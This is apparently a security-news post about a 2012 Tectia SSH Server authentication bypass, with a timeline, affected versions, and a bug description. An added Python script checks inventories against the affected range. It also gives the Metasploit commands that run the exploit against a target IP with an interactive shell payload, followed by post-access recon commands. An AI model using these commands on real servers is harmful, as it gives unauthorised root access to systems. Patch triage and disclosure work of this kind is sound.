aka wow on ZATAZ.com
Tectia SSH Server Authentication Bypass Metasploit Demo
Timeline :
Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01
Metasploit PoC on 2012-12-04
PoC provided by :
kingcope
bperry
sinn3r
Reference(s) :
Full Disclosure
Tectia Support
Affected version(s) :
SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2
Tested on CentOS 5.8 x86 with :
SSH Tectia Server 6.3.2-33
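An added example (not part of the original post, and not code from SSH Communications Security or Metasploit) for triaging an inventory against the affected ranges listed above. The host names and the sample inventory are constructed, and the assumption is that versions are recorded as "major.minor.patch" with an optional "-build" suffix, as in the tested build 6.3.2-33.

```python
import re

# Affected ranges copied from the "Affected version(s)" list on this page.
AFFECTED_RANGES = [
    ((6, 0, 4), (6, 0, 20)),
    ((6, 1, 0), (6, 1, 12)),
    ((6, 2, 0), (6, 2, 5)),
    ((6, 3, 0), (6, 3, 2)),
]

# Assumed format: "6.3.2" or "6.3.2-33" (the build suffix is ignored).
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)(?:-(\d+))?\s*$")


def parse_version(text):
    """Return (major, minor, patch), or None if the string is not recognised."""
    match = _VERSION_RE.match(text)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1, 2, 3))


def is_affected(text):
    """True/False for a parsed version, None when the version cannot be parsed."""
    version = parse_version(text)
    if version is None:
        return None
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


def triage(inventory):
    """Sort (host, version) pairs into affected / not_listed / unparsed."""
    report = {"affected": [], "not_listed": [], "unparsed": []}
    for host, version_text in inventory:
        verdict = is_affected(version_text)
        if verdict is None:
            report["unparsed"].append(host)  # needs manual review
        elif verdict:
            report["affected"].append(host)
        else:
            report["not_listed"].append(host)  # outside the ranges on this page
    return report


# Constructed sample inventory (hypothetical hosts).
SAMPLE = [("host-a", "6.3.2-33"), ("host-b", "6.0.3"), ("host-c", "6.1.12"),
          ("host-d", "6.3.3"), ("host-e", "unknown"), ("host-f", "6.2.6-1")]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE).items():
        print(bucket, hosts)
```

A host in "not_listed" is only outside the ranges given on this page; "unparsed" entries should be checked by hand rather than treated as unaffected.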
Description :
This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by an SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request sent before password authentication, which allows any remote user to bypass the login routine and then gain access as root.
Commands :
use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
/sbin/ifconfig
great
oooooo, very nice bro , thanks
,, send meeeeeeee :X